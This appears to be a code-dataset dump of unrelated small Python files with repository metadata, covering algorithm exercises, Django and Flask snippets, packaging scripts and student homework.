def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BlockQuery):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"lauraweindorf@gmail.com"
] | lauraweindorf@gmail.com |
e1c654b5c5879d0a85c2468db88c9e1e295c6459 | 1537873b83d1f3245ff60d2f95c366b163691f55 | /target_offer/dfs+bfs+动态规划/数字--线性动规/机器人的运动范围.py | ef7914742a6af2840ebf5f090343c75c5083832d | [] | no_license | 20130353/Leetcode | dc5c7fb08932abbf11e22e91b3edecac7f8753d5 | 488345a4713fae553559176c5bd3681e3bcac57d | refs/heads/master | 2020-03-31T08:46:12.005167 | 2020-03-15T16:32:11 | 2020-03-15T16:32:11 | 152,071,790 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,623 | py | # -*- coding: utf-8 -*-
# Author: sunmengxin
# time: 10/19/18
# file: 机器人的运动范围.py
# description:
'''
给定一个棋盘,要求机器人只能走上下左右的方向,不能进入到坐标之和等与s的方格,求机器人能进入多少方格?
'''
'''
反思:
1. 自定义的变量需要在init初始化函数中声明
2. 函数传递参数记得数好,代码检查要检查好!
3. 边界,看清是从1开始还是从0开始的!
'''
class Solution:
def __init__(self):
self.dir = [[0, 1], [0, -1], [1, 0], [-1, 0]]
def get_sum(self, a, b):
if a < 10:
sum_a = a
else:
sum_a = sum(list(map(int, str(a))))
if b < 10:
sum_b = b
else:
sum_b = sum(list(map(int, str(b))))
return sum_a + sum_b
def DFS(self, th, sum_, i, j, m, n, vis):
for k in range(4):
ni = i + self.dir[k][0]
nj = j + self.dir[k][1]
if ni >= 0 and nj >= 0 and ni < m and nj < n and not vis[ni][nj] and self.get_sum(ni, nj) <= th:
vis[ni][nj] = True
sum_[0] = sum_[0] + 1
self.DFS(th, sum_, ni, nj, m, n, vis)
def movingCount(self, threshold, rows, cols):
vis = [[False for _ in range(cols)] for _ in range(rows)]
sum_ = [0]
if threshold > 0:
sum_[0] = 1
vis[0][0] = True
self.DFS(threshold, sum_, 0, 0, rows, cols, vis)
return sum_[0]
if __name__ == '__main__':
so = Solution()
print(so.movingCount(15, 20, 20))
| [
"739400043@qq.com"
] | 739400043@qq.com |
99e5fa424a0ef71e162af19730fb467ff208dda8 | ef7eabdd5f9573050ef11d8c68055ab6cdb5da44 | /topCoder/srms/200s/srm221/div2/equal_substrings.py | b0909199b0c977307630973da3fc00be1ae58a2c | [
"WTFPL"
] | permissive | gauravsingh58/algo | cdbf68e28019ba7c3e4832e373d32c71902c9c0d | 397859a53429e7a585e5f6964ad24146c6261326 | refs/heads/master | 2022-12-28T01:08:32.333111 | 2020-09-30T19:37:53 | 2020-09-30T19:37:53 | 300,037,652 | 1 | 1 | WTFPL | 2020-10-15T09:26:32 | 2020-09-30T19:29:29 | Java | UTF-8 | Python | false | false | 292 | py | class EqualSubstrings:
def getSubstrings(self, str):
def is_fine(x, y):
return x.count('a') == y.count('b')
for i in xrange(len(str), 0, -1):
x, y = str[0:i], str[i:]
if is_fine(x, y):
return x, y
return '', str
| [
"elmas.ferhat@gmail.com"
] | elmas.ferhat@gmail.com |
09ce6b21b33aa832fc02eedb80d4a02dd5349e4e | c31c8095ce4d4e9686e3e7ad6b004342e49671fa | /forum/migrations/0038_auto_20181103_2022.py | 76831b0281d57327f7f14a521318272b62657bcc | [] | no_license | Lionalisk/arrakambre | 7bcc96dea2ca2a471572bfb1646256f1382ce25b | 2caece9be5eebf21ddfa87a6c821c32b5d5019a2 | refs/heads/master | 2020-12-07T19:31:24.471090 | 2020-01-09T10:14:29 | 2020-01-09T10:14:29 | 232,782,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | # Generated by Django 2.1.1 on 2018-11-03 19:22
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forum', '0037_auto_20181103_1946'),
]
operations = [
migrations.AlterField(
model_name='commande',
name='date_validation',
field=models.DateTimeField(default=datetime.timedelta(0, 3600)),
),
]
| [
"lionel.varaire@free.fr"
] | lionel.varaire@free.fr |
bc5282590911d672024b010162ceacde85e9483f | 66f037cc0bf8683a814eb610d06edd3667f962e0 | /setup.py | 290b05874a5fd75eb62e9e02646db0773d3d63ac | [
"Apache-2.0"
] | permissive | cemsbr/pyescpos | 6118e7fcf4b5e85b94639be42cfb6fe87f084ba9 | 58ebc1b544458803c4235f3fa80e8fa376b18ec2 | refs/heads/master | 2020-12-08T07:20:24.977694 | 2019-12-30T00:33:08 | 2019-12-30T00:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Base4 Sistemas Ltda ME
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import io
import os
import re
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
def read_version():
content = read(os.path.join('escpos', '__init__.py'))
return re.search(r"__version__ = '([^']+)'", content).group(1)
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', 'Arguments to pass to py.test')]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ''
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import shlex
import pytest # import here, cause outside the eggs aren't loaded
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
long_description = read('README.rst')
install_requires = [
'future',
'six',
'python-decouple',
]
extras_require = {
'bluetooth': [
'PyBluez',
],
'serial': [
'pySerial',
],
'usb': [
'PyUSB'
],
}
setup(
name='PyESCPOS',
version=read_version(),
description='Support for Epson ESC/POS printer command system.',
long_description=long_description,
long_description_content_type='text/x-rst',
packages=[
'escpos',
'escpos.impl',
'escpos.conn',
],
install_requires=install_requires,
extras_require=extras_require,
tests_require=[
'pytest==2.9.2',
],
cmdclass={
'test': PyTest
},
test_suite='escpos.tests',
include_package_data=True,
license='Apache Software License',
platforms='any',
url='http://github.com/base4sistemas/pyescpos/',
author='Daniel Gonçalves',
author_email='daniel@base4.com.br',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Printing',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Office/Business :: Financial :: Point-Of-Sale',
]
)
| [
"daniel@base4.com.br"
] | daniel@base4.com.br |
b1a17e6907ea12401d7c3347b6eec3575696d4e3 | 5a92bb59c2cc369840b4b79f3bc60f868f179aad | /musette/decorators.py | 20cb02004d72c33d4d8ea3718ed2f3262d122e76 | [] | no_license | mapeveri/django-musette | fc4c2629f3f5f913fa07b1f1910b01ae1da20a85 | c255f96eb8e95676a37fc0d6fce05c5212dce5c0 | refs/heads/master | 2023-04-28T20:22:56.576693 | 2018-01-26T21:04:29 | 2018-01-26T21:04:29 | 36,764,649 | 52 | 16 | null | 2023-04-16T14:39:16 | 2015-06-02T22:06:42 | Python | UTF-8 | Python | false | false | 592 | py | from django.http import HttpResponseRedirect
def user_is_troll(f):
"""
Decorator for check if the user is a troll.
Args:
f (function): Function to decorated.
Returns:
function: wrap function.
"""
def wrap(request, *args, **kwargs):
if request.user.is_authenticated():
is_troll = request.user.user.is_troll
if not is_troll:
return f(request, *args, **kwargs)
else:
return HttpResponseRedirect('/')
else:
return HttpResponseRedirect('/')
return wrap
| [
"martinpeveri@gmail.com"
] | martinpeveri@gmail.com |
b0af1ed7b613f4265aabeb10d41c8e0bfe612097 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/409/usersdata/329/79574/submittedfiles/av1_programa1.py | 2ed47605cdf936c44c7349f815554de8ad917b01 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | # -*- coding: utf-8 -*-
numero = int(input("digite o valor de numero="))
PAR = numero*0.5
if par\\0:
print("PAR")
else :
print("IMPAR")
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
b9d447833ab24d6874b73bbb3fdfdabb55b0f5e3 | eafddc14e1381db53b87d42e7aa12dfb4bcf2d6e | /pandemonium/demons/online_td.py | 3bece670fce0ac68e4ce456ffac707d4821b1a45 | [] | no_license | konichuvak/pandemonium | b9d1d2f8c3529b6869f6bda1d6ca10c6c0f94052 | 57083b311ea209fe156f8575cc682e6c88211b74 | refs/heads/master | 2022-11-23T21:57:21.276033 | 2020-07-26T03:42:51 | 2020-07-26T03:42:51 | 240,851,837 | 1 | 0 | null | 2020-07-06T19:54:41 | 2020-02-16T07:45:09 | Python | UTF-8 | Python | false | false | 1,844 | py | from typing import Type
import torch
import torch.nn.functional as F
from pandemonium.demons import PredictionDemon, Demon, Loss, ControlDemon
from pandemonium.experience import Transition
from pandemonium.traces import EligibilityTrace, AccumulatingTrace
from pandemonium.utilities.utilities import get_all_classes
class OnlineTD(Demon):
r""" Base class for backward-view (online) :math:`\TD` methods. """
def __init__(self,
trace_decay: float,
eligibility: Type[EligibilityTrace] = AccumulatingTrace,
criterion: callable = F.smooth_l1_loss,
**kwargs):
super().__init__(eligibility=None, **kwargs)
self.criterion = criterion
# TODO: fails for distributional learning and non-FA
if isinstance(self, PredictionDemon):
trace_dim = next(self.avf.parameters()).shape
elif isinstance(self, ControlDemon):
trace_dim = next(self.aqf.parameters()).shape
else:
raise TypeError(self)
self.λ = eligibility(trace_decay, trace_dim)
def delta(self, t: Transition) -> Loss:
""" Specifies the update rule for approximate value function (avf)
Since the algorithms in this family are online, the update rule is
applied on every `Transition`.
"""
raise NotImplementedError
def target(self, t: Transition, v: torch.Tensor):
""" Computes one-step update target. """
raise NotImplementedError
def learn(self, t: Transition):
assert len(t) == 1
# # Off policy importance sampling correction
# π = self.gvf.π.dist(t.x0, self.aqf).probs[0][t.a]
# b = self.μ.dist(t.x0, self.aqf).probs[0][t.a]
# ρ = π / b
return self.delta(t[0])
__all__ = get_all_classes(__name__)
| [
"arialinvlad@gmail.com"
] | arialinvlad@gmail.com |
0dc698dfd287422f17b4fb2d0ef103d508285cfd | 81dcd706b4d879fa4348630c24c86b88b6c570e2 | /rx/concurrency/scheduleditem.py | fd7fd360f7b6836e1b7eb31f61750f6ad7a31830 | [
"Apache-2.0"
] | permissive | Reactive-Extensions/RxPy | 763996efc5eeecb8af308d70bf2f1e64601cff79 | 9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec | refs/heads/master | 2023-06-12T16:58:04.960259 | 2013-09-26T16:20:15 | 2013-09-26T16:20:15 | 13,126,788 | 81 | 12 | null | 2015-06-16T08:16:50 | 2013-09-26T15:44:19 | Python | UTF-8 | Python | false | false | 1,335 | py | from datetime import timedelta
from rx.disposables import SingleAssignmentDisposable
def default_sub_comparer(x, y):
#print ("default_sub_comparer", x, y)
return 0 if x == y else 1 if x > y else -1
class ScheduledItem(object):
def __init__(self, scheduler, state, action, duetime, comparer=None):
self.scheduler = scheduler
self.state = state
self.action = action
self.duetime = duetime
self.comparer = comparer or default_sub_comparer
self.disposable = SingleAssignmentDisposable()
def invoke(self):
self.disposable.disposable = self.invoke_core()
def compare_to(self, other):
#print ("ScheduledItem:compare_to()", self.comparer)
return self.comparer(self.duetime, other.duetime)
def is_cancelled(self):
#print ("is_cancelled(%s)" % self.disposable.is_disposed)
return self.disposable.is_disposed
def invoke_core(self):
#print("ScheduledItem:invoke_core", self.action.__doc__)
return self.action(self.scheduler, self.state)
def __lt__(self, other):
print (self.compare_to(other))
return self.compare_to(other) < 0
def __gt__(self, other):
return self.compare_to(other) > 0
def __eq__(self, other):
return self.compare_to(other) == 0
| [
"dag@brattli.net"
] | dag@brattli.net |
2658e1e8eb6cdeb61ce04a68e94ef08aa83f927d | 9eaa2c64a777bd24a3cccd0230da5f81231ef612 | /study/1905/month01/code/Stage2/day05/seek.py | 6c571cb29330f9a2272cd42ca7c5fb461ab8de33 | [
"MIT"
] | permissive | Dython-sky/AID1908 | 4528932f2ca66b844d8a3fcab5ed8bf84d20eb0c | 46cd54a7b36b5f009974f2bbb7005a4ad440ca1a | refs/heads/master | 2022-04-14T12:23:30.426270 | 2020-04-01T18:05:19 | 2020-04-01T18:05:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | """
seek.py 文件偏移量
注意:1.每次open打开文件偏移量都在开头
2.以a的方式打开时文件偏移量在结尾
3.读写操作共用一个文件偏移的
"""
f = open("test.txt","rb+") # 读写
data = f.read(5)
print("文件偏移量:",f.tell()) # 查看文件偏移量
f.seek(10,2) # 文件偏移量位置
f.write(b"&&&")
f.close()
| [
"dong_1998_dream@163.com"
] | dong_1998_dream@163.com |
91bb1b26efd36c500d9e15b58b14f8ad7f72edcf | 05e590af914370c3fe02526794ce9b41be893d2c | /day03/BMI輸入.py | cb18dff4cc02d0f77076c8344e698d4428201d39 | [] | no_license | vincenttuan/yzu_python_20210414 | bf0f1d9f8549086008fe15701204dfc3a9ebf85a | b464c4691ce12e9076c8c2ab74158aeb4edc5bc7 | refs/heads/master | 2023-06-09T19:30:24.930453 | 2021-06-30T13:31:29 | 2021-06-30T13:31:29 | 362,433,389 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | h = input('請輸入身高:')
w = input('請輸入體重:')
print(h, type(h))
print(w, type(w))
h = float(h) # 將 str 轉成 float
w = float(w) # 將 str 轉成 float
print(h, type(h))
print(w, type(w))
bmi = w / ((h/100) ** 2)
print("%.2f" % bmi)
| [
"vincentjava@yahoo.com.tw"
] | vincentjava@yahoo.com.tw |
49fa4272dfdc25cd6155b9142b112894cde12ff6 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_199/1106.py | 366d126dd8acc1bd5de5d462ea61c8629d734481 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | import sys
def pancakes(pancakes, k):
pancakes = map(lambda x: 0 if x == '+' else 1, pancakes)
flips = []
# print str(pancakes)
for i in range(len(pancakes) - k + 1):
num_flips = 0
for j in range(max(0, i - k + 1), i):
num_flips ^= flips[j]
flips.append(pancakes[i] ^ num_flips)
for i in range(len(pancakes) - k + 1, len(pancakes)):
num_flips = 0
for j in range(max(0, i - k + 1), min(i, len(pancakes) - k + 1)):
num_flips ^= flips[j]
if pancakes[i] ^ num_flips == 1:
return "IMPOSSIBLE"
return sum(flips)
if __name__ == '__main__':
test = open(sys.argv[1], 'r')
for i in range(int(test.readline().strip())):
pcks, k = test.readline().split(' ')
print('Case #' + str(i + 1) + ': ' + str(pancakes(pcks, int(k))))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
e19ad2f849b496bee9dad29daa61c493127d6b68 | 790743ea7f6f2d3b15fcd847171cb5d902380387 | /wfdispatcher/helpers/sanitize.py | 72ea67a0ac7e425df57fc5a8835a2d92d27c1df3 | [
"MIT"
] | permissive | lsst-sqre/wfdispatcher | d10cad7e83fce62b95b53c8bde608482d2287090 | 28761df89b44f0c46f4d15142e10bbd963203f35 | refs/heads/master | 2021-07-18T18:54:21.345342 | 2021-01-25T21:29:17 | 2021-01-25T21:29:17 | 235,692,956 | 0 | 0 | NOASSERTION | 2020-10-05T17:12:48 | 2020-01-23T00:07:36 | Python | UTF-8 | Python | false | false | 415 | py | from argo.workflows.client import ApiClient
def sanitize(obj):
"""Return an object suitable for a JSON post.
"""
cl = ApiClient()
try:
return cl.sanitize_for_serialization(obj)
except AttributeError:
# This catches
# AttributeError: 'V1Container' object has no attribute 'swagger_types'
d_obj = obj.to_dict()
return cl.sanitize_for_serialization(d_obj)
| [
"athornton@gmail.com"
] | athornton@gmail.com |
5b35c432076b79190742a987b3d54936865f38e8 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2341/48117/267922.py | d402df48cf6014e22ca2f603971451d052caa831 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | questNum = int(input())
for quest in range(questNum):
n1n2 = input().split(' ')
n1 = int(n1n2[0])
n2 = int(n1n2[1])
s1 = input().split(' ')
s2 = input().split(' ')
for i in range(n1):
s1[i] = int(s1[i])
for j in range(n2):
s2[j] = int(s2[j])
p1 = 0
p2 = 0
ans = []
while p1 < n1 and p2 < n2:
if s1[p1] < s2[p2]:
ans.append(s1[p1])
p1 += 1
else:
ans.append(s2[p2])
p2 += 1
if p1 >= n1:
ans += s2[p2:]
elif p2 >= n2:
ans += s1[p1:]
for i in range(len(ans)):
if i != len(ans) - 1:
print(ans[i], end=' ')
else:
print(ans[i], end=' ')
print() | [
"1069583789@qq.com"
] | 1069583789@qq.com |
078f9c1b302d74b436331fcec70a91af4674d2ea | f66e6a3bc5f6eae570afa2013325d462f530cff6 | /core/seller/migrations/0020_auto_20210306_1009.py | 9cbeffc379f38f47209547f43ed97b420be855db | [] | no_license | Mahe07/vyavaharback | 3cb30e227d9e0c25c86ba4e20f9cafce054c4a2a | 4e35cac3b643197a78e420d34ea3f45cce368e46 | refs/heads/main | 2023-08-10T17:21:56.538518 | 2021-09-17T03:53:44 | 2021-09-17T03:53:44 | 407,386,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | # Generated by Django 3.1.6 on 2021-03-06 04:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('seller', '0019_auto_20210306_1001'),
]
operations = [
migrations.AddField(
model_name='seller',
name='GST_commission',
field=models.DecimalField(decimal_places=2, max_digits=999999999, null=True),
),
migrations.AddField(
model_name='seller',
name='TCS',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='seller',
name='gross_commission',
field=models.DecimalField(decimal_places=2, max_digits=999999999, null=True),
),
migrations.AddField(
model_name='seller',
name='net_commission',
field=models.DecimalField(decimal_places=2, max_digits=999999999, null=True),
),
]
| [
"noreply@github.com"
] | Mahe07.noreply@github.com |
23b5f27bb1a0350685945804c329b647dfa28c29 | 05a70c12df808455100598d8a6fdb5635c641ab8 | /Ene-Jun-2019/Ejemplos/Patrones de Diseño/strategy.py | 35f73bb89aa9b988c20e2b14fe555abd0e23aac4 | [
"MIT"
] | permissive | Jonathan-aguilar/DAS_Sistemas | 991edcc929c33ba9bb8bc84e741b55c10a8420a3 | 4d02efc64161871084df1bff258112351e5d1241 | refs/heads/development | 2023-07-24T12:26:54.698452 | 2021-09-02T20:52:26 | 2021-09-02T20:52:26 | 289,764,892 | 1 | 0 | MIT | 2021-09-02T20:52:27 | 2020-08-23T20:54:55 | Python | UTF-8 | Python | false | false | 1,051 | py | import abc
class Context:
def __init__(self, strategy):
self._strategy = strategy
def context(self):
self._strategy.sort()
def set_strategy(self, strategy):
self._strategy = strategy
class Strategy(metaclass=abc.ABCMeta):
@abc.abstractmethod
def sort(self):
pass
class QuickSort(Strategy):
def sort(self):
print('Ya ordene con QuickSort!')
class MergeSort(Strategy):
def sort(self):
print('Ya ordene con MergeSort!')
class BubbleSort(Strategy):
def sort(self):
print('Ya ordene con BubbleSort')
def main():
# Aquí estoy ordenando 1000000 elementos
quick_sort = QuickSort()
context = Context(quick_sort)
context.context()
# Aquí estoy ordenando 100000 elementos
merge_sort = MergeSort()
context.set_strategy(merge_sort)
context.context()
# Aquí estoy ordenando 100 elementos
bubble_sort = BubbleSort()
context.set_strategy(bubble_sort)
context.context()
if __name__ == "__main__":
main() | [
"anhell.death999@gmail.com"
] | anhell.death999@gmail.com |
fac4f2b518f628a2e53ff0ddf3d1d5613d4373eb | 518d911a66485947c5d336e96a842f162ef9caf1 | /res/scripts/client/gui/scaleform/daapi/view/meta/browsermeta.py | 0274a83671990e9a045e8ed867bbf228e331291c | [] | no_license | wotmods/WOTDecompiled | 84b8e5d32ee73e1356b4d57318eb76dfac6b5220 | 45fd599666c55cb871f6b84b0ec977b9d4baf469 | refs/heads/master | 2020-12-25T21:34:26.096544 | 2014-11-05T13:58:39 | 2014-11-05T13:58:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,466 | py | # 2014.10.18 14:42:01 Central European Daylight Time
#Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/BrowserMeta.py
from gui.Scaleform.framework.entities.DAAPIModule import DAAPIModule
class BrowserMeta(DAAPIModule):
def browserAction(self, action):
self._printOverrideError('browserAction')
def browserMove(self, x, y, z):
self._printOverrideError('browserMove')
def browserDown(self, x, y, z):
self._printOverrideError('browserDown')
def browserUp(self, x, y, z):
self._printOverrideError('browserUp')
def browserFocusOut(self):
self._printOverrideError('browserFocusOut')
def onBrowserShow(self, needRefresh):
self._printOverrideError('onBrowserShow')
def onBrowserHide(self):
self._printOverrideError('onBrowserHide')
def as_loadingStartS(self):
if self._isDAAPIInited():
return self.flashObject.as_loadingStart()
def as_loadingStopS(self):
if self._isDAAPIInited():
return self.flashObject.as_loadingStop()
def as_configureS(self, title, showActionBtn):
if self._isDAAPIInited():
return self.flashObject.as_configure(title, showActionBtn)
+++ okay decompyling res/scripts/client/gui/scaleform/daapi/view/meta/browsermeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.10.18 14:42:01 Central European Daylight Time
| [
"chodakk@RWAMWCOE31488.emea.roche.com"
] | chodakk@RWAMWCOE31488.emea.roche.com |
2e45e4afa57edbe0a2068c79d6929b87ee5a18d1 | 5c6fc62dd057301907c83f3fc29349e3ee02a375 | /picking_invoice_pending/__openerp__.py | 9f6c7c7493c4b014bef424a744febf1d7981e250 | [] | no_license | Comunitea/custom_apolo | 45ce0c79d07269e02099e0bdfdad461d48b73f34 | d74cee261ea703fe5dc34dd33f374695f8d76b57 | refs/heads/master | 2021-03-22T04:38:21.738794 | 2015-12-28T12:31:01 | 2015-12-28T12:31:01 | 31,951,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Authors: Santiago Argüeso
# Copyright Pexego SL 2012
# Omar Castiñeira Saavedra Copyright Comunitea SL 2015
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Pending invoices accounting from Picking',
'description': "Allow to account invoices when transfering incoming "
"pickings, when invoice is validated previous account move "
"is reverted.",
'version': '1.0',
'author': 'Pexego',
'category': 'Finance',
'website': 'http://www.pexego.es',
'depends': ['base',
'account',
'account_reversal',
'stock',
'midban_issue',
'purchase_discount',
'midban_depot_stock'],
'data': ['res_company_view.xml',
'stock_picking_view.xml'],
'active': False,
'installable': True,
}
| [
"omarcs7r@gmail.com"
] | omarcs7r@gmail.com |
058531a00970d0ad1c88dd43821e6e0509a17daa | 72db77883a5d2d841908f67f85f395c614c53832 | /demo.py | cd2047c26df87a4f869e0714fc79d17b12aeb43c | [] | no_license | limo1995/atari-cma-es | c7045af05542a10aa7c479da40bd4c6d17466667 | 7f3a1693112dfa71306b95c628a58b16cfb34242 | refs/heads/master | 2021-09-24T14:03:10.787313 | 2018-10-10T02:57:04 | 2018-10-10T02:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,165 | py | import models
import mentalitystorm.transforms as tf
import torchvision.transforms as TVT
from mentalitystorm.basemodels import MultiChannelAE
from mentalitystorm.runners import Run
from mentalitystorm.config import config
from mentalitystorm.policies import VCPolicyMultiAE, RolloutGen
from mentalitystorm.data_containers import ActionEmbedding
import torch
import gym
from viewer import *
shots = tf.ColorMask(lower=[128, 128, 128], upper=[255, 255, 255], append=True)
player = tf.ColorMask(lower=[30, 100, 40], upper=[70, 180, 70], append=True)
cut_player = tf.SetRange(0, 60, 0, 210, [4])
invader = tf.ColorMask(lower=[120, 125, 25], upper=[140, 140, 130], append=True)
cut_invader = tf.SetRange(0, 30, 0, 210, [5])
barrier = tf.ColorMask(lower=[120, 74, 30], upper=[190, 100, 70], append=True)
select = tf.SelectChannels([3, 4, 5, 6])
observe = tf.ViewChannels('transform', (320, 480), channels=[0, 1, 2])
segmentor = TVT.Compose([shots, player, cut_player, invader, cut_invader,
barrier, select, TVT.ToTensor(), tf.CoordConv()])
device = config.device()
shot_encoder = Run.load_model(r'.\modelzoo\vision\shots.run').eval().to(device=config.device())
player_encoder = Run.load_model(r'.\modelzoo\vision\player.run').eval().to(device=config.device())
invaders_encoder = Run.load_model(r'.\modelzoo\vision\invaders.run').eval().to(device=config.device())
barrier_encoder = Run.load_model(r'.\modelzoo\vision\barrier.run').eval().to(device=config.device())
visuals = MultiChannelAE()
visuals.add_ae(shot_encoder, [0, 4, 5], [0])
visuals.add_ae(player_encoder, [1, 4, 5], [1])
visuals.add_ae(invaders_encoder, [2, 4, 5], [2])
visuals.add_ae(barrier_encoder, [3, 4, 5], [3])
visuals.register_forward_hook(view_decode)
visuals.register_forward_hook(view_image)
controller_file = config.basepath() / 'SpaceInvaders-v4' / 'policy_runs' / '12' / 'best_model0'
controller = torch.load(controller_file)
env = gym.make('SpaceInvaders-v4')
policy = VCPolicyMultiAE(visuals, controller, segmentor, device)
for screen, observation, reward, done, info, action in RolloutGen(env, policy, render_to_window=True, populate_screen=True):
pass
| [
"duane.nielsen.rocks@gmail.com"
] | duane.nielsen.rocks@gmail.com |
959c221a758d984633a88e173de535bdbc2ce2a4 | 9c4850697d66c6119e1d0b1f6347c1ea1d5d1ebb | /devilry/thirdpartylibs/djangorestframework/tests/package.py | 4e1e23da0fa83946dc917366bb1345b093d1f662 | [
"BSD-2-Clause"
] | permissive | evestera/devilry-django | 7952e0d65f23af6c4dc2fd22fb97462e4231deac | 760a4ca1c40a7ac0d60f7675efa6919ffae585da | refs/heads/master | 2020-12-25T20:09:00.756243 | 2015-05-21T16:33:47 | 2015-05-21T16:33:47 | 36,460,383 | 0 | 0 | null | 2015-05-28T19:14:10 | 2015-05-28T19:14:09 | null | UTF-8 | Python | false | false | 337 | py | """Tests for the djangorestframework package setup."""
from django.test import TestCase
from devilry.thirdpartylibs import djangorestframework
class TestVersion(TestCase):
"""Simple sanity test to check the VERSION exists"""
def test_version(self):
"""Ensure the VERSION exists."""
djangorestframework.VERSION
| [
"post@espenak.net"
] | post@espenak.net |
8ca177fd23012a8e8f97b04acebaeeaa67b2d729 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/Cases/2461/.mooctest/answer.py | ee1e496ff71961d6141dd1bb59c5ad82861e8bd9 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | class Solution:
def findMin(self, nums) -> int:
for i in range(len(nums)-1):
if nums[i+1] < nums[i]: return nums[i+1]
return nums[0]
b = input().split(',')
c= []
for i in b:
c.append(int(i))
s = Solution()
print(s.findMin(c)) | [
"382335657@qq.com"
] | 382335657@qq.com |
f175cb18b3e42357f3f0e429e996aca1a42426d7 | bb29dcc06b2f405e4e76d886ae5b60254fc13c3d | /web.py | 79299c4e85a8d72bd52a8d3370b2f1aa5af61755 | [
"MIT"
] | permissive | cientista/ua-parser-website | 330b66df4f4b878442b7af236c5a14f134e81aca | d0911c46baef8115c5504c4020300477c3a3162c | refs/heads/master | 2020-05-27T02:01:16.474172 | 2019-05-02T06:31:31 | 2019-05-02T06:31:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | import json
from flask import Flask, render_template, request
from ua_parser import user_agent_parser
app = Flask(__name__)
@app.route("/")
def index():
ua = request.args.get('ua')
if ua:
parsed = user_agent_parser.Parse(ua)
parsed_encoded = json.dumps(parsed, indent=2)
else:
parsed_encoded = None
current_ua = request.headers.get('User-Agent')
return render_template("index.html",
ua=ua,
current_ua=current_ua,
parsed_encoded=parsed_encoded)
| [
"roman.imankulov@gmail.com"
] | roman.imankulov@gmail.com |
